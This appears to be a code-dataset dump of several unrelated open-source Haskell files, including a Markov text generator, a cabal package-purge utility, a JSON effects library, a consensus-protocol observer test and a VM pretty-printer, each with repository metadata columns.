code stringlengths 5 1.03M | repo_name stringlengths 5 90 | path stringlengths 4 158 | license stringclasses 15 values | size int64 5 1.03M | n_ast_errors int64 0 53.9k | ast_max_depth int64 2 4.17k | n_whitespaces int64 0 365k | n_ast_nodes int64 3 317k | n_ast_terminals int64 1 171k | n_ast_nonterminals int64 1 146k | loc int64 -1 37.3k | cycloplexity int64 -1 1.31k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
module GHCJS.DOM.WebKitAnimationEvent (
) where
| manyoo/ghcjs-dom | ghcjs-dom-webkit/src/GHCJS/DOM/WebKitAnimationEvent.hs | mit | 50 | 0 | 3 | 7 | 10 | 7 | 3 | 1 | 0 |
{-|
Module : HsToCoq.Coq.Preamble
Description : Static preamble for all hs-to-coq output
Copyright : Copyright © 2017 Antal Spector-Zabusky, University of Pennsylvania
License : MIT
Maintainer : antal.b.sz@gmail.com
Stability : experimental
-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE OverloadedLists #-}
module HsToCoq.Coq.Preamble
( staticPreamble
, builtInAxioms
) where
import Data.Text (Text)
import qualified Data.Text as T
import HsToCoq.Coq.Gallina
import HsToCoq.Coq.Gallina.Orphans ()
import qualified Data.Map as M
import Data.Bifunctor
staticPreamble :: Text
staticPreamble = T.unlines
[ "(* Default settings (from HsToCoq.Coq.Preamble) *)"
, ""
, "Generalizable All Variables."
, ""
, "Unset Implicit Arguments."
, "Set Maximal Implicit Insertion."
, "Unset Strict Implicit."
, "Unset Printing Implicit Defensive."
, ""
, "Require Coq.Program.Tactics."
, "Require Coq.Program.Wf."
]
-- | When a free variable of this name appears in the output,
-- an axiom of the type given here is added to the preamble
builtInAxioms :: M.Map Qualid Term
builtInAxioms = M.fromList $ map (first Bare)
[ "missingValue" =: Forall [ ImplicitBinders (pure (Ident (Bare "a"))) ] a
]
where
a = "a"
(=:) = (,)
infix 0 =:
| antalsz/hs-to-coq | src/lib/HsToCoq/Coq/Preamble.hs | mit | 1,284 | 0 | 17 | 241 | 207 | 126 | 81 | 30 | 1 |
{-# LANGUAGE NoMonomorphismRestriction #-}
{-# LANGUAGE OverloadedStrings #-}
module Markov where
import Control.Applicative
import qualified Control.Monad.Random as R
import Data.List (foldl')
import qualified Data.HashMap.Lazy as M
import System.Random.Mersenne.Pure64
import Data.Hashable
import qualified Data.Text as T
type MarkovI a = M.HashMap a (Maybe [(a, Rational)])
newtype Markov g a = Markov{ getMarkov :: M.HashMap a (Maybe (R.Rand g a)) }
type Err = String
data Outcome g a =
Error Err
| Val a g
| End
deriving (Show, Eq)
runMarkov1 :: (R.RandomGen g, Hashable a, Eq a) => Markov g a -> g -> a -> Outcome g a
runMarkov1 mkv gen x = case M.lookup x (getMarkov mkv) of
Nothing -> Error "Internal error; cannot find value"
Just rs -> case flip R.runRand gen <$> rs of
Nothing -> End
Just (a, g) -> Val a g
runMarkov :: (R.RandomGen g, Hashable a, Eq a) => Integer -> Markov g a -> g -> a -> Either Err [a]
runMarkov n mkv gen x = go n
where
go m | m <= 0 = Right []
| otherwise = (x:) <$> case runMarkov1 mkv gen x of
Val a g -> runMarkov (n-1) mkv g a
End -> Right []
Error err -> Left err
fromMarkovI :: R.RandomGen g => MarkovI a -> Markov g a
fromMarkovI = Markov . M.map (R.fromList <$>)
insertMkvI :: (Hashable a, Eq a) => Rational -> a -> a -> MarkovI a -> MarkovI a
insertMkvI r k v mkv = M.insert k (Just $ case M.lookup k mkv of
Nothing -> [(v, r)]
Just xs -> case xs of
Nothing -> [(v, r)]
Just ys -> (v, r):ys) mkv
insertEnd :: (Hashable a, Eq a) => a -> MarkovI a -> MarkovI a
insertEnd k = M.insert k Nothing
insertMkvPairsInto :: (Hashable a, Eq a) => MarkovI a -> [(a, a)] -> MarkovI a
insertMkvPairsInto mkv [] = mkv
insertMkvPairsInto mkv ps = insertEnd lst $ foldl' (flip (uncurry (insertMkvI 1))) mkv ps
where lst = snd $ last ps
fromList :: (Hashable a, Eq a, R.RandomGen g) => [(a, [(a, Rational)])] -> Markov g a
fromList = Markov . foldl' (flip $ uncurry ins) M.empty
where ins a b m = case b of
[] -> M.insert a Nothing m
_ -> M.insert a (Just $ R.fromList b) m
wordPairs :: T.Text -> [(T.Text, T.Text)]
wordPairs = (zip <*> tail) . T.words
insertSentence :: MarkovI T.Text -> T.Text -> MarkovI T.Text
insertSentence mkv = insertMkvPairsInto mkv . wordPairs
fromSentences :: R.RandomGen g => [T.Text] -> Markov g T.Text
fromSentences = fromMarkovI . foldl' insertSentence M.empty
runFromSentences :: Int -> [T.Text] -> IO (Either Err T.Text)
runFromSentences n sentences = do
g <- newPureMT
let hds = map (head . T.words) sentences
seed <- R.uniform hds
return $ T.unwords <$> runMarkov n (fromSentences sentences) g seed
| 5outh/markov-sim | Markov.hs | mit | 2,784 | 0 | 15 | 700 | 1,212 | 627 | 585 | 62 | 3 |
module Main (main) where
import ProjectEuler.CommandLine
| Javran/Project-Euler | exe/Main.hs | mit | 58 | 0 | 4 | 7 | 14 | 9 | 5 | 2 | 0 |
{-# LANGUAGE EmptyDataDecls, EmptyCase, ExistentialQuantification,
ScopedTypeVariables, NoMonomorphismRestriction, Rank2Types,
PatternSynonyms #-}
module MAlonzo.Code.Qplfa.Naturals where
import MAlonzo.RTE (coe, erased, AgdaAny, addInt, subInt, mulInt,
quotInt, remInt, geqInt, ltInt, eqInt, eqFloat, add64, sub64,
mul64, quot64, rem64, lt64, eq64, word64FromNat, word64ToNat)
import qualified MAlonzo.RTE
import qualified Data.Text
name4 = "plfa.Naturals.N"
d4 = ()
data T4 = C6 | C8 T4
| manhong2112/CodeColle | Agda/MAlonzo/Code/Qplfa/Naturals.hs | mit | 557 | 0 | 6 | 123 | 115 | 75 | 40 | 12 | 1 |
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE TemplateHaskell #-}
{-# LANGUAGE CPP #-}
module Main where
import Data.Maybe (listToMaybe, mapMaybe)
import Stackage.CLI
import Filesystem
import Control.Exception (Exception, catch)
import Control.Monad
import Control.Monad.Catch (MonadThrow, throwM)
import Control.Applicative
import Data.Monoid
import Data.Typeable (Typeable)
import Options.Applicative (Parser, flag, long, help)
import System.Process (readProcess)
import Data.Char (toLower)
import System.IO (stdout, stderr, hFlush, hPutStrLn)
import qualified Data.Text.Encoding as T
import qualified Data.Text as T
import System.Environment (getArgs)
import System.Exit (exitFailure)
import qualified Paths_stackage_cabal as CabalInfo
import Text.Parsec hiding ((<|>), many)
type ParsecParser = Parsec String ()
data Force = Prompt | Force
data PurgeOpts = PurgeOpts
{ purgeOptsForce :: Force }
data PackageGroup = PackageGroup
{ packageGroupDb :: String
, packageGroupPackages :: [String]
}
data PurgeException
= ParsePackagesError ParseError
deriving (Show, Typeable)
instance Exception PurgeException
prompt :: String -> IO String
prompt str = putStr str >> hFlush stdout >> getLine
whenJust :: Monad m => Maybe a -> (a -> m ()) -> m ()
whenJust (Just a) f = f a
whenJust Nothing _ = return ()
pluralize :: Int -> a -> a -> a
pluralize 1 a _ = a
pluralize _ _ a = a
unregisterPackages :: String -> [String] -> IO ()
unregisterPackages packageDb = mapM_ unregister where
unregister package = do
putStrLn $ "Unregistering: " <> package
_ <- readProcess "ghc-pkg" (args package) ""
return ()
args package =
[ "unregister"
, package
, "--force"
] <> dbToArgs (Just packageDb)
parsePackageDb :: IO (Maybe String)
parsePackageDb = do
cabalSandboxConfigExists <- isFile "cabal.sandbox.config"
if cabalSandboxConfigExists
then do
t <- Filesystem.readTextFile "cabal.sandbox.config"
let packageDbLine = T.stripPrefix "package-db: "
return $ fmap T.unpack $ listToMaybe $ mapMaybe packageDbLine $ T.lines t
else
return Nothing
dbToArgs :: Maybe String -> [String]
dbToArgs Nothing = []
dbToArgs (Just packageDb) =
[ "--package-db"
, packageDb
]
getGlobalPackageDb :: IO (Maybe String)
getGlobalPackageDb = do
let fakePackage = "asdklfjasdklfajsdlkghaiwojgadjfkq"
output <- readProcess "ghc-pkg" ["list", fakePackage] ""
return $ fmap init $ listToMaybe (lines output)
-- fmap init is to get rid of the trailing colon
getPackages :: Maybe String -> IO [PackageGroup]
getPackages mPackageDb = parsePackages =<< readProcess "ghc-pkg" args "" where
args = ["list"] <> dbToArgs mPackageDb
parsePackages :: MonadThrow m => String -> m [PackageGroup]
parsePackages
= either (throwM . ParsePackagesError) return
. parse packagesParser ""
-- #28
#if !MIN_VERSION_parsec(3,1,6)
crlf :: ParsecParser Char
crlf = char '\r' *> char '\n' <?> "crlf new-line"
endOfLine :: ParsecParser Char
endOfLine = newline <|> crlf <?> "new-line"
#endif
ending :: ParsecParser ()
ending = eof <|> void endOfLine
packagesParser :: ParsecParser [PackageGroup]
packagesParser = many1 parseGroup
parseGroup :: ParsecParser PackageGroup
parseGroup = PackageGroup <$> parseDb <*> parseDbPackages <* many endOfLine
parseDb :: ParsecParser String
parseDb = manyTill anyChar $ try (char ':' *> ending)
parseDbPackages :: ParsecParser [String]
parseDbPackages = try parseNoPackages <|> many1 parsePackage
parseNoPackages :: ParsecParser [String]
parseNoPackages = many1 (char ' ') *> string "(no packages)" *> ending *> pure []
parsePackage :: ParsecParser String
parsePackage = many1 (char ' ') *> manyTill anyChar ending
purge :: PurgeOpts -> IO ()
purge opts = do
cabalConfigExists <- isFile "cabal.config"
when cabalConfigExists $ do
removeFile "cabal.config"
globalPackageDbMay <- getGlobalPackageDb
sandboxPackageDbMay <- parsePackageDb
let displaySandbox s
| Just s == globalPackageDbMay =
"(Global) " <> s
| Just s == sandboxPackageDbMay =
"(Sandbox) " <> s
| otherwise = s
packages <- getPackages sandboxPackageDbMay
forM_ packages $ \(PackageGroup db packages) -> do
putStrLn $ displaySandbox db
let nPackages = length packages
let showNPackages
= show nPackages
<> " "
<> pluralize nPackages "package" "packages"
putStrLn
$ "Detected "
<> showNPackages
<> " to purge from this database"
when (nPackages > 0) $ do
when (nPackages < 15) $ mapM_ putStrLn packages
shouldUnregister <- case purgeOptsForce opts of
Force -> do
putStrLn $ "(--force) Unregistering " <> showNPackages
return True
Prompt -> do
line <- prompt
$ "Unregister " <> showNPackages <> " (y/n)? [default: n] "
case map toLower line of
"y" -> return True
"yes" -> return True
_ -> return False
when shouldUnregister $ unregisterPackages db packages
return ()
purgeOptsParser :: Parser PurgeOpts
purgeOptsParser = PurgeOpts <$> forceOpt where
forceOpt = flag Prompt Force mods
mods = long "force"
<> help "Purge all packages without prompt"
version :: String
version = $(simpleVersion CabalInfo.version)
header :: String
header = "Delete cabal.config and purge your package database"
progDesc :: String
progDesc = header
handlePurgeExceptions :: PurgeException -> IO ()
handlePurgeExceptions (ParsePackagesError _) = do
hPutStrLn stderr $ "Failed to parse ghc-pkg output"
exitFailure
main :: IO ()
main = do
(opts, ()) <- simpleOptions
version
header
progDesc
purgeOptsParser -- global parser
empty -- subcommands
purge opts `catch` handlePurgeExceptions
| fpco/stackage-cabal | main/Purge.hs | mit | 5,869 | 0 | 23 | 1,219 | 1,683 | 850 | 833 | 162 | 4 |
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE ScopedTypeVariables #-}
module Test.Observer (observer_tests) where
import Hetcons.Hetcons_Exception ( Hetcons_Exception )
import Hetcons.Instances_Proof_of_Consensus ( observers_proven )
import Hetcons.Observer (Observer, basic_observer_server )
import Hetcons.Participant ( current_nanoseconds )
import Hetcons.Send_Message_IO
( Address_Book
,default_Address_Book
,send_Message_IO
,domain_name )
import Hetcons.Signed_Message
( Encodable
,encode
,Recursive_1b
,Recursive_1a
,Verified
,Recursive_2b
,Recursive_Proof_of_Consensus
,Monad_Verify(verify)
,sign )
import Test.Util ()
import Charlotte_Consts ( sUPPORTED_SIGNED_HASH_TYPE_DESCRIPTOR )
import qualified Hetcons_Observer as Observer ( process )
import qualified Hetcons_Observer_Iface as Observer
( ping, phase_2b )
import Hetcons_Observer_Iface ( Hetcons_Observer_Iface )
import Hetcons_Participant ( process )
import Hetcons_Participant_Iface
( Hetcons_Participant_Iface, ping, proposal_1a, phase_1b )
import Charlotte_Types
( Participant_ID(participant_ID_crypto_id, participant_ID_address)
,default_Participant_ID
,Slot_Value(slot_Value_slot, slot_Value_value_payload)
,default_Slot_Value
,Observers(observers_observer_quorums)
,default_Observers
,Proposal_1a(proposal_1a_observers, proposal_1a_timestamp
,proposal_1a_value)
,default_Proposal_1a
,Public_Crypto_Key(public_Crypto_Key_public_crypto_key_x509)
,default_Public_Crypto_Key
,Crypto_ID(crypto_ID_public_crypto_key)
,default_Crypto_ID
,Signed_Message
,Phase_1b(phase_1b_proposal)
,default_Phase_1b
,Phase_2b(phase_2b_phase_1bs)
,default_Phase_2b
,Host_Address(host_Address_dns_name)
,default_Host_Address
,Timestamp
,Address(address_port_number, address_host_address)
,default_Address
)
import Control.Concurrent ( forkIO, ThreadId )
import Control.Concurrent.MVar ( putMVar, takeMVar, newEmptyMVar )
import Crypto.Random ( getSystemDRG, DRG, withDRG )
import qualified Data.ByteString.Lazy as ByteString
( singleton, readFile, empty )
import Data.ByteString.Lazy ( ByteString )
import Data.HashSet ( fromList )
import Test.HUnit
( Test(TestList, TestLabel, TestCase), assertEqual, assertBool )
import qualified Data.HashMap.Strict as HashMap ( fromList )
import Data.HashMap.Strict ()
import Data.Text.Lazy ( pack )
import Thrift.Server ( runBasicServer )
doubleGen :: (DRG g) => g -> (g,g)
doubleGen g = withDRG g (return g)
listGen :: (DRG g) => g -> [g]
listGen g = g:(listGen (snd (withDRG g (return ()))))
sample_payload :: Integer
sample_payload = 1337
sample_message :: IO (Either Hetcons_Exception Signed_Message)
sample_message = sample_sign sample_payload
sample_sign :: (Encodable a) => a -> IO (Either Hetcons_Exception Signed_Message)
sample_sign payload =
do { gen <- getSystemDRG
; cert <- ByteString.readFile "test/cert.pem"
; private <- ByteString.readFile "test/key.pem"
; let crypto_id = default_Crypto_ID {crypto_ID_public_crypto_key =
Just (default_Public_Crypto_Key {
public_Crypto_Key_public_crypto_key_x509 = Just cert})}
; return $ sign crypto_id private sUPPORTED_SIGNED_HASH_TYPE_DESCRIPTOR gen payload}
sample_id cert port =
default_Participant_ID {
participant_ID_address =
default_Address {
address_host_address =
default_Host_Address {
host_Address_dns_name = Just $ pack "localhost"}
,address_port_number = port}
,participant_ID_crypto_id =
default_Crypto_ID {
crypto_ID_public_crypto_key =
Just (default_Public_Crypto_Key {
public_Crypto_Key_public_crypto_key_x509 = Just cert})}}
-- sample_1a :: Proposal_1a
sample_1a now recipients = default_Proposal_1a {
proposal_1a_value = encode default_Slot_Value {
slot_Value_value_payload = ByteString.singleton 42
,slot_Value_slot = 6}
,proposal_1a_timestamp = now
,proposal_1a_observers = Just default_Observers {
observers_observer_quorums = Just $ HashMap.fromList
[(r, fromList [fromList recipients]) | r <- recipients] }}
deStupidify :: (Monad m) => Either a (m b) -> (m (Either a b))
deStupidify (Left x) = return (Left x)
deStupidify (Right x) = do { y <- x
; return (Right y)}
data Dummy_Participant = Dummy_Participant {
on_ping :: IO ()
,on_proposal_1a :: Signed_Message -> IO ()
,on_phase_1b :: Signed_Message -> IO ()
}
instance Hetcons_Participant_Iface Dummy_Participant where
ping = on_ping
proposal_1a v x _ = on_proposal_1a v x
phase_1b v x _ = on_phase_1b v x
dummy_participant_server :: (Integral a) => a -> Dummy_Participant -> IO ThreadId
dummy_participant_server port dummy = forkIO $ runBasicServer dummy process (fromIntegral port)
data Dummy_Observer = Dummy_Observer {
dummy_observer_on_ping :: IO ()
,dummy_observer_on_phase_2b :: Signed_Message -> IO ()
}
instance Hetcons_Observer_Iface Dummy_Observer where
ping = dummy_observer_on_ping
phase_2b = dummy_observer_on_phase_2b
dummy_observer_server :: (Integral a) => a -> Dummy_Observer -> IO ThreadId
dummy_observer_server port dummy = forkIO $ runBasicServer dummy Observer.process (fromIntegral port)
launch_dummy_observer :: (Integral a) => a -> IO (a, Timestamp, Address_Book, ByteString)
launch_dummy_observer port = do
{ now <- current_nanoseconds
; receipt_2b <- newEmptyMVar
; address_book <- default_Address_Book
; cert <- ByteString.readFile "test/cert.pem"
; (Right signed_1a) <- sample_sign $ sample_1a now [sample_id cert (fromIntegral port)]
; let (Right (v1a :: (Verified (Recursive_1a Slot_Value)))) = verify signed_1a
; (Right signed_1b) <- sample_sign $ default_Phase_1b { phase_1b_proposal = signed_1a }
; let (Right (v1b :: (Verified (Recursive_1b Slot_Value)))) = verify signed_1b
; (Right signed_2b) <- sample_sign $ default_Phase_2b { phase_2b_phase_1bs = fromList [signed_1b]}
; let (Right (v2b :: (Verified (Recursive_2b Slot_Value)))) = verify signed_2b
; dummy_observer <- dummy_observer_server port (Dummy_Observer { dummy_observer_on_ping = return ()
, dummy_observer_on_phase_2b = putMVar receipt_2b})
; send_Message_IO address_book ByteString.empty v2b
; takeMVar receipt_2b >>= assertEqual "received 2b is not sent 2b" signed_2b
; return (port, now, address_book, cert)
}
launch_observer :: (Integral a) => a -> IO (a, Timestamp, Address_Book, ByteString, ByteString)
launch_observer port = do
{ (used_port, now, address_book, cert) <- launch_dummy_observer port
; let new_port = used_port + 1
; private <- ByteString.readFile "test/key.pem"
; proof_receipt <- newEmptyMVar
; observer <- (basic_observer_server
(default_Crypto_ID {
crypto_ID_public_crypto_key =
Just (default_Public_Crypto_Key {
public_Crypto_Key_public_crypto_key_x509 = Just cert})})
private
(fromIntegral new_port)
(putMVar proof_receipt :: ((Verified (Recursive_Proof_of_Consensus Slot_Value)) -> IO ())))
; (Right signed_1a) <- sample_sign $ sample_1a now [sample_id cert (fromIntegral new_port)]
; let (Right (v1a :: (Verified (Recursive_1a Slot_Value)))) = verify signed_1a
; (Right signed_1b) <- sample_sign $ default_Phase_1b { phase_1b_proposal = signed_1a }
; let (Right (v1b :: (Verified (Recursive_1b Slot_Value)))) = verify signed_1b
; (Right signed_2b) <- sample_sign $ default_Phase_2b { phase_2b_phase_1bs = fromList [signed_1b]}
; let (Right (v2b :: (Verified (Recursive_2b Slot_Value)))) = verify signed_2b
; send_Message_IO address_book ByteString.empty v2b
; assertBool "have launched an observer" True
; received_proof <- takeMVar proof_receipt
; assertEqual "incorrect observers proven" ("localhost:"++(show $ fromIntegral new_port)++",") $
foldr (\n x -> x ++ (domain_name n) ++ ":"++ (show $ address_port_number $ participant_ID_address n) ++",") "" $ observers_proven received_proof
; return (new_port, now, address_book, cert, private)
}
observer_tests = TestList [
TestLabel "Verify we can launch at least a dummy observer" (
TestCase ( launch_dummy_observer 86000 >> return ()))
,TestLabel "Verify we can launch at a basic observer" (
TestCase ( launch_observer 86001 >> return ()))
]
| isheff/hetcons | test/Test/Observer.hs | mit | 8,771 | 0 | 17 | 1,833 | 2,254 | 1,236 | 1,018 | 176 | 1 |
{-# LANGUAGE OverloadedStrings #-}
module Fractions where
import Control.Applicative
import Data.Ratio ((%))
import Text.Trifecta
badFractions :: [String]
badFractions = ["1/0", "10"]
goodFractions :: [String]
goodFractions = ["1/2", "2/1"]
parseFraction :: Parser Rational
parseFraction = do
numerator <- decimal
_ <- char '/'
denominator <- decimal
return (numerator % denominator)
virtuousParser :: Parser Rational
virtuousParser = do
numerator <- decimal
_ <- char '/'
denominator <- decimal
case denominator of
0 -> fail "Denominator cannot be zero"
_ -> return (numerator % denominator)
mainFractions :: IO ()
mainFractions = do
mapM_ (print . parseString virtuousParser mempty) goodFractions
mapM_ (print . parseString virtuousParser mempty) badFractions
print "foo"
| JoshuaGross/haskell-learning-log | Code/Haskellbook/catchall/src/Fractions.hs | mit | 850 | 0 | 12 | 181 | 245 | 125 | 120 | 28 | 2 |
{-# LANGUAGE DeriveFunctor #-}
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE FlexibleContexts #-}
{-# LANGUAGE ScopedTypeVariables #-}
{-# LANGUAGE RankNTypes #-}
{-# LANGUAGE ExistentialQuantification #-}
{-# LANGUAGE TypeOperators #-}
module Control.Eff.JSON
where
import Data.Data (Typeable)
import Data.ByteString.Lazy hiding (unzip, empty)
import Data.Text hiding (empty)
import Data.Aeson
import Data.Aeson.Types
import qualified Data.HashMap.Strict as HM
import Control.Eff
----------
-- Effects
----------
-- | Effect type for json input effects.
data JSONIn n
= MaybeValue Text (Maybe Value -> n)
| forall a. ThrowJSONError JSONError (a -> n)
deriving (Typeable)
instance Functor JSONIn where
fmap f (MaybeValue t n) = MaybeValue t (f . n)
fmap f (ThrowJSONError e n) = ThrowJSONError e (f . n)
-- | An error occuring during the processing of the effects
data JSONError
= MissingProperty Text
| CantDecodeProperty Text String -- ^ name of property and aeson error message
| CantDecodeObject ByteString
deriving (Show)
maybeValue :: Member JSONIn r => Text -> Eff r (Maybe Value)
maybeValue t = send $ \ next -> inj (MaybeValue t next)
throwJSONError :: Member JSONIn r => JSONError -> Eff r a
throwJSONError err = send $ \ next -> inj (ThrowJSONError err next)
-- | Effect type for json output effects
data JSONOut n
= forall a. ToJSON a => WriteProp Text a (a -> n)
deriving (Typeable)
instance Functor JSONOut where
fmap f (WriteProp t v n) = WriteProp t v (f . n)
writeProp :: (Member JSONOut r, ToJSON a) => Text -> a -> Eff r a
writeProp p v = send $ \ next -> inj (WriteProp p v next)
------------
-- Operators
------------
-- TODO: I need to think ahout the operators. '?' should
-- mean something with maybe, '$' should mean something with
-- effects, but i does not seem to be consistent atm.
-- | Write an ordinary value to the JSON-output
(<:) :: (ToJSON a, Member JSONOut r)
=> Text -> a -> Eff r a
(<:) = writeProp
infixl 0 <:
-- | Write effectful value to the JSON-output
(<$) :: (ToJSON a, Member JSONOut r)
=> Text -> Eff r a -> Eff r a
p <$ e = e >>= writeProp p
infixl 0 <$
-- | Write the outputs of some monads to a list in the output
(<$:) :: (ToJSON a, Member JSONOut r)
=> Text -> [Eff r a] -> Eff r [a]
p <$: ms = do
xs <- sequence . fmap extract $ ms
let (json, res) = unzip xs
p <: toJSON json
return res
infixl 0 <$:
-- | Write the json output of the monad to the property
(<$.) :: Member JSONOut r
=> Text -> Eff r a -> Eff r a
p <$. m = do
(val, res) <- extract m
p <: val
return res
infixl 0 <$.
-- | Get the property if it is there.
maybeProp :: (FromJSON a, Member JSONIn r)
=> Text -> Eff r (Maybe a)
maybeProp p = do
val <- maybeValue p
case val of
Nothing -> return Nothing
Just v -> case parseEither parseJSON v of
Left err -> throwJSONError $ CantDecodeProperty p err
Right res -> return . Just $ res
-- | Get the property or throw error if that is not possible
prop :: (FromJSON a, Member JSONIn r)
=> Text -> Eff r a
prop p = do
val <- maybeProp p
case val of
Nothing -> throwJSONError $ MissingProperty p
Just val -> return val
-- | Use the value of a property to get a new monad.
($>) :: (FromJSON a, Member JSONIn r)
=> Text -> (a -> Eff r b) -> Eff r b
p $> m = prop p >>= m
infixl 0 $>
-- | Use the value of a property to get a new monad if it is there.
(?>) :: (FromJSON a, Member JSONIn r )
=> Text -> (a -> Eff r b) -> Eff r (Maybe b)
p ?> m = do
val <- maybeProp p
case val of
Nothing -> return Nothing
Just v -> do
res <- m v
return $ Just res
infixl 0 ?>
-- | Use the value of a property as input for the monad.
(.$>) :: Member JSONIn r
=> Text -> Eff r a -> Eff r a
p .$> m = do
obj <- prop p
useObject obj m
infixl 0 .$>
-- | Use the value of a property as input for the monad if it is there.
(.?>) :: Member JSONIn r
=> Text -> Eff r a -> Eff r (Maybe a)
p .?> m = do
obj' <- maybeProp p
case obj' of
Nothing -> return Nothing
Just obj -> do
res <- useObject obj m
return . Just $ res
infixl 0 .?>
(.??>) :: (Member JSONIn r, Show err)
=> Text -> Eff r (Either err a) -> Eff r (Maybe a)
p .??> m = do
res <- p .?> m
case res of
Nothing -> return Nothing
Just (Left err) -> throwJSONError . CantDecodeProperty p . show $ err
Just (Right r) -> return . Just $ r
-- | Helper for composition, has higher fixity than read
-- and write operators.
(.$) = ($)
infixr 1 .$
-----------
-- Handlers
-----------
extract :: Member JSONOut r
=> Eff r a -> Eff r (Value, a)
extract eff = go [] (admin eff)
where
go j (Val a) = return (object j, a)
go j (E req) = interpose req (go j) $
\ (WriteProp p v next) -> go ((p, toJSON v):j) (next v)
useObject :: Member JSONIn r
=> Object -> Eff r a -> Eff r a
useObject obj eff = go obj (admin eff)
where
go obj (Val a) = return a
go obj (E req) = interpose req (go obj) $
\ req -> case req of
MaybeValue t next -> go obj (next $ HM.lookup t obj)
ThrowJSONError err _ -> throwJSONError err
runJSONIn :: Object -> Eff (JSONIn :> r) a -> Eff r (Either JSONError a)
runJSONIn obj eff = go obj (admin eff)
where
go obj (Val a) = return . Right $ a
go obj (E req) = handleRelay req (go obj) $
\ req -> case req of
MaybeValue t next -> go obj (next $ HM.lookup t obj)
ThrowJSONError err _ -> return $ Left err
runJSONIn' :: ByteString -> Eff (JSONIn :> r) a -> Eff r (Either JSONError a)
runJSONIn' bs eff =
let dec = decode bs
in case dec of
Just obj -> runJSONIn obj eff
Nothing -> return . Left $ CantDecodeObject bs
runJSONOut :: Eff (JSONOut :> r) a -> Eff r (Value, a)
runJSONOut eff = go [] (admin eff)
where
go j (Val a) = return (object j, a)
go j (E req) = handleRelay req (go j) $
\ (WriteProp p v next) -> go ((p, toJSON v):j) (next v)
runJSONIO :: Object -> Eff (JSONOut :> JSONIn :> r) a -> Eff r (Either JSONError (Value, a))
runJSONIO obj = runJSONIn obj . runJSONOut
runJSONIO' :: ByteString -> Eff (JSONOut :> JSONIn :> r) a -> Eff r (Either JSONError (Value, a))
runJSONIO' bs = runJSONIn' bs . runJSONOut
| lechimp-p/json-effects | Control/Eff/JSON.hs | mit | 6,548 | 0 | 16 | 1,849 | 2,428 | 1,229 | 1,199 | 153 | 3 |
module PPL2.Pretty.MState where
import PPL2.Prelude
import PPL2.VM.Types
import PPL2.VM.Memory.State
import PPL2.Pretty.Instr
import PPL2.VM.Memory.RTS (RTS)
import PPL2.VM.Memory.Segment (Segment)
import PPL2.VM.Memory.Stack (Stack)
import PPL2.VM.Memory.CodeSeg (CodeSegment)
import qualified PPL2.VM.Memory.RTS as RTS
import qualified PPL2.VM.Memory.Segment as Segment
import qualified PPL2.VM.Memory.Stack as Stack
import qualified PPL2.VM.Memory.CodeSeg as CodeSeg
import PPL2.CodeGen.Builder (Builder(..),builder2List)
type Lines = Builder String
ln :: String -> Lines
ln l = BU (l:)
nl = ln ""
prettyMState :: (Show v) => MState v -> String
prettyMState = unlines . builder2List . prettyMState'
prettyMState' :: (Show v) => MState v -> Lines
prettyMState' s = mconcat $
[ nl
, ln "machine state"
, ln "============="
, nl
, ln "status register"
, ln "==============="
, nl
, prettyMStatus $ s ^. msStatus
, nl
, ln "program counter"
, ln "==============="
, nl
, prettyPC $ s ^. msPC
, nl
, ln "evaluation stack"
, ln "================"
, nl
, prettyStack $ s ^. msStack
, nl
, ln "global memory"
, ln "============="
, nl
, prettySegment $ s ^. msMem
, nl
, ln "runtime stack"
, ln "============="
, nl
, prettyRTS $ s ^. msFrames
, nl
]
prettyMStatus :: Show v => MStatus v -> Lines
prettyMStatus s = ln $ fmt' ["status", show s]
prettyPC :: CodeRef -> Lines
prettyPC pc' = ln $ fmt' ["pc", show pc']
prettyStack :: Show v => Stack v -> Lines
prettyStack s
| null s' =
ln "<empty>"
| otherwise =
mconcat $ zipWith cell [0::Int ..] s'
where
cell i v =
ln $ fmt' [show i, show v]
s' = Stack.unStack s
prettySegment :: Show v => Segment v -> Lines
prettySegment =
mconcat . zipWith cell [0..] . Segment.dump
where
cell i v = ln $ fmt' [show i, show v]
prettyRTS :: Show v => RTS v -> Lines
prettyRTS rts = ln "RTS dump not yet implemented"
| UweSchmidt/ppl2 | src/PPL2/Pretty/MState.hs | mit | 1,974 | 0 | 10 | 443 | 694 | 383 | 311 | 70 | 1 |
module Rhodium.Types (
Program(..)
, Clause(..)
, Morphism(..)
, Pat(..)
, Name
, Binds
, Stack
, Value(..)
, showRh
)
where
import Data.ByteString ( ByteString )
import Data.ByteString.UTF8 ( toString )
import Data.ByteString.Short ( ShortByteString, fromShort )
import Text.PrettyPrint
data Program = Program [(Name,Value)] deriving (Show)
data Clause = Clause [Pat] [Morphism] [Pat] deriving (Show)
data Morphism =
Morphism [Pat] Name [Pat]
deriving (Show)
data Pat =
Pat Name [Pat]
| PVar Name
deriving (Show)
type Name = ByteString
-- ShortByteString
type Binds = [(Name,Value)]
type Stack = [Value]
data Value =
Value Name [Value]
| VFun [Clause]
deriving (Show)
-- pretty printing of Rhodium code
class ToDoc a where
toDoc :: a -> Doc
instance ToDoc ShortByteString where
toDoc = text . toString . fromShort
instance ToDoc ByteString where
toDoc = text . toString
instance ToDoc Pat where
toDoc (Pat name pats) =
toDoc name <> if null pats then empty
else parens (hsep $ map toDoc pats)
toDoc (PVar name) =
toDoc name
instance ToDoc Morphism where
toDoc (Morphism ins f outs) =
hsep (map toDoc ins) <+> text ">-" <+> toDoc f <+> text "->" <+> hsep (map toDoc outs)
instance ToDoc Clause where
toDoc (Clause pats [] ctrs) =
hsep (map toDoc pats) <+> text ">->" <+> hsep (map toDoc ctrs)
toDoc (Clause pats mors ctrs) =
(toDoc (Clause pats [] ctrs) <+> text ":=")
$+$ nest 4 (vcat $ map toDoc mors)
instance ToDoc Program where
toDoc (Program defs) =
vcat $ map f defs
where
f (name, VFun clauses) =
toDoc name <+> lbrace
$+$ nest 4 (vcat $ map toDoc clauses)
$+$ rbrace
f (name, v@(Value _ _)) =
toDoc name <> text " := " <> toDoc v
instance ToDoc Value where
toDoc (Value name pats) =
toDoc name <> if null pats then empty
else parens (hsep $ map toDoc pats)
toDoc (VFun clauses) =
lbrace
$+$ nest 4 (vcat $ map toDoc clauses)
$+$ rbrace
showRh :: ToDoc a => a -> IO ()
showRh = putStrLn . render . toDoc
